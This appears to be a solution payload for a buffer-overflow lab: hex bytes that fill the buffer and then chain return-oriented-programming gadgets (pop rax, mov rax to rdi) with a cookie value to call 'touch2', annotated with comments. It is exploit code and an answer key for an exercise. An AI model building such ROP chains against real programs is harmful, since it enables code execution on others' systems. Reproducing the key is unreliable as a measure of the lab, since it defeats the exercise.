90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
ab 19 40 00 00 00 00 00  /* set an address of a gadget which pops a value from the stack into a register rax */
fa 97 b9 59 00 00 00 00  /* cookie value */
c5 19 40 00 00 00 00 00  /* address of gadget which moves val from rax to rdi */
ec 17 40 00 00 00 00 00  /* address of touch 2 */

/*
00 00 00 00 00 40 19 ab  /* set an address of a gadget which pops a value from the stack into a register rax */
00 00 00 00 fa 97 b9 59  /* cookie value */
00 00 00 00 00 40 19 c5  /* address of gadget which moves val from rax to rdi */
00 00 00 00 00 40 17 ec  /* address of touch 2 */
*/
